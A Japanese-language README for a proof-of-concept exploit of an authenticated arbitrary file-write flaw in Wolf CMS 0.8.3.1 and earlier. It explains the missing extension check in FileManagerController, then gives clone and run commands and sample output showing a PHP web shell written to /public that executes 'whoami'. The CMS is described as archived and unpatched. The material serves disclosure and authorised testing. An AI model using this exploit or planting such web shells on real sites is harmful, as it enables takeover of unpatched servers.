
Wolf CMS <= 0.8.3.1 用の PoC エクスプロイト: Admin に認証し、FileManagerController を介して /public に任意の PHP ファイルを書き込み、Web シェルを通じてコマンドを実行します。
このリポジトリには、CVE-2026-67206 の Proof of Concept(PoC) エクスプロイトが含まれています。
このプロジェクトは、教育目的および許可されたセキュリティテストのためにのみ提供されています。所有していない、またはテストする許可がないシステムに対して使用しないでください。
Wolf CMS バージョン 0.8.3.1 以前には、任意ファイル書き込みの脆弱性が存在します。これにより、認証済みの攻撃者が FileManagerController.php の create_file() および save() 関数を介して、Web ルートの /public ディレクトリに悪意のある任意のファイルを書き込むことができます。FileManagerController.php の create_file() 関数はファイル拡張子を検証しないため、認証済みの攻撃者が悪意のある PHP スクリプトを書き込み、リモートコード実行権限を取得することが可能になります。
ソースコード分析とエクスプロイトのデモを含む詳細な解説は、私の Medium ブログに掲載されています。
Wolf CMS の全バージョン(0.8.3.1 まで)が影響を受けます。Wolf CMS リポジトリは 2021年8月28日 にアーカイブされ、現在は積極的にメンテナンスされていません。この脆弱性に対するパッチは現在存在しません。
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Logging in with provided credentials...
[+] Login successful
[*] Creating a file named shell.php...
[+] File creation successful
[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data